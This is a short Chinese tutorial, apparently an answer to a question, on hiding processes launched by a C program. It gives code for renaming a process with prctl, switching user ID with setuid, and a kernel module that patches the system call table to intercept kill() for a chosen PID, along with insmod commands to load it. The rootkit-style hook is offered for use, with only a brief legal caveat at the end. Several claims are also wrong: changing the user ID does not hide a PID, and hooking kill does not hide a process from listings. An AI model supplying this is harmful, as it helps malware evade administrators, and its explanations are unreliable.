隐藏由c程序执行的系统进程

要隐藏由C程序执行的系统进程，可以使用以下方法：

1. 修改进程名：通过修改进程名，可以使进程在系统中显示不易被察觉。可以使用prctl()函数来修改进程名。以下是示例代码：

#include <sys/prctl.h>

int main() {
    prctl(PR_SET_NAME, "my_hidden_process", NULL, NULL, NULL);
    // 这里是你的程序逻辑
    return 0;
}

2. 隐藏进程ID：通过使用setuid()和setgid()函数设置进程的用户ID和组ID，可以使进程在系统中显示为其他用户的进程。以下是示例代码：

#include <unistd.h>

int main() {
    setuid(1000); // 设置用户ID为1000
    setgid(1000); // 设置组ID为1000
    // 这里是你的程序逻辑
    return 0;
}

3. 隐藏进程：通过使用Linux的内核模块或者LD_PRELOAD技术，可以动态修改系统调用，使进程在系统中隐藏起来。以下是示例代码：

// my_hide.c
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>

// 定义要隐藏的进程ID
#define HIDDEN_PID 1234

// 定义要隐藏的系统调用
unsigned long **sys_call_table;

// 定义原始的系统调用函数指针
asmlinkage long (*original_sys_kill)(pid_t pid, int sig);

// 定义新的系统调用函数
asmlinkage long new_sys_kill(pid_t pid, int sig) {
    if (pid == HIDDEN_PID) {
        return 0; // 隐藏进程ID为HIDDEN_PID的kill系统调用
    }
    return original_sys_kill(pid, sig);
}

static int __init my_hide_init(void) {
    sys_call_table = (unsigned long**)kallsyms_lookup_name("sys_call_table");
    original_sys_kill = (void*)sys_call_table[__NR_kill];
    sys_call_table[__NR_kill] = (unsigned long*)new_sys_kill;
    printk(KERN_INFO "Hidden process initialized\n");
    return 0;
}

static void __exit my_hide_exit(void) {
    sys_call_table[__NR_kill] = (unsigned long*)original_sys_kill;
    printk(KERN_INFO "Hidden process unloaded\n");
}

module_init(my_hide_init);
module_exit(my_hide_exit);
MODULE_LICENSE("GPL");

编译和加载内核模块：

$ make
$ insmod my_hide.ko

这样就可以隐藏进程ID为HIDDEN_PID的kill系统调用。

请注意，隐藏系统进程可能违反操作系统的安全策略，并且可能违反法律法规。在实际应用中，请谨慎使用并遵守相关规定。